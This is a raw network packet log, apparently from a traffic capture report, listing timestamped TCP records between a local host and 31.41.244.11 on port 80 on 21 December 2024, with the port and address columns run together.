                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.063184977 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.063236952 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.064234972 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.064354897 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.064382076 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.064398050 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.065385103 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.065489054 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.065538883 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.066531897 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.066590071 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.066651106 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.066689014 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.067760944 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.067804098 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.067862988 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.067900896 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.068919897 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.069008112 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.069060087 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.070055008 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.070106983 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.070200920 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.070245028 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.071254969 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.071326017 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.071469069 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.071527958 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.072453976 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.072575092 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.072627068 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.073632002 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.073702097 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.073733091 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.073805094 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.074783087 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.074829102 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.074949026 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.074991941 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.075984955 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.076035976 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.076064110 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.076105118 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.077162027 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.077261925 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.077316046 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.078294992 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.078346014 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.078461885 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.078505993 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.079463005 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.079505920 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.079608917 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.079649925 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.080662966 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.080758095 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.080807924 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.081849098 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.081903934 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.081964970 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.082009077 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.083058119 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.083106041 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.083230972 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.083272934 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.084223986 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.084294081 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.084342957 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.084393978 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.085383892 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.085570097 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.085628986 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.086586952 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.086636066 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.086708069 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.086754084 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.087759972 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.087807894 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.087996006 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.088041067 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.088937044 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.089046955 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.089098930 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.090188980 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.090243101 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.090318918 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.090364933 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.091280937 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.091327906 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.091358900 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.091404915 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.092493057 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.092607021 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.092658043 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.093628883 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.093693972 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.093730927 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.093775988 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.094803095 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.094927073 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.094983101 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.095974922 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.096023083 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.096088886 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.096133947 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.097212076 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.097333908 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.097363949 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.097378016 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.098328114 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.098377943 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.098457098 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.098501921 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.099504948 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.099548101 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.099598885 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.099641085 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.100677967 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.100718975 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.100836039 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.100887060 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.101890087 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.101932049 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.101983070 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.102021933 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.102988005 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.103056908 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.233366966 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.233535051 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.233580112 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.233618975 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.233619928 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.233656883 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.233804941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.233845949 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.234807014 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.234855890 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.234940052 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.234999895 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.235981941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.236041069 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.236124992 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.236164093 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.237175941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.237310886 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.237333059 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.237392902 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.238346100 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.238430023 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.238522053 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.238641977 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.239501953 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.239562035 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.239618063 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.240076065 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.240725040 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.240853071 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.240891933 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.241877079 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.241920948 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.242144108 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.242188931 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.243041992 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.243083000 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.243136883 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.243174076 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.244214058 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.244254112 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.244319916 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.244358063 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.245378017 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.245440006 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.245486975 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.245526075 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.246562004 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.246602058 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.246706963 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.246916056 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.247742891 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.247783899 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.247852087 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.247893095 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.248981953 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.249026060 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.249136925 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.249208927 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.250169992 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.250216007 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.250300884 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.250339031 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.251338959 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.251501083 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.251538992 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.252456903 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.252501011 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.252574921 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.252681971 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.253674984 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.253717899 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.253801107 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.253842115 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.254832983 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.254872084 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.254971027 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.255003929 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.256036997 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.256079912 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.256172895 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.256212950 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.257282019 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.257323980 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.257400036 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.257561922 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.258335114 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.258378029 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.258445978 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.258486032 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.259519100 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.259562969 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.259644985 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.259685040 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.260746956 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.260911942 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.260952950 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.261894941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.261992931 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.262022018 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.262166023 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.263053894 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.263097048 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.263207912 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.263744116 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.264183044 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.264303923 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.264343977 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.265069008 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.265115976 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.265176058 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.265398026 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.266072989 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.266113997 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.266223907 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.266335011 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.267108917 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.267167091 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.267290115 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.267327070 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.268090963 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.268184900 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.268208981 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.268249035 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.269123077 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.269170046 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.269229889 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.269371986 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.270090103 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.270133972 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.270237923 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.270598888 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.271120071 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.271250963 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.271298885 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.272130966 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.272239923 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.272258043 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.272293091 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.273144960 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.273253918 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.273263931 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.273549080 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.274188995 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.274230003 CET4979780192.168.2.431.41.244.11
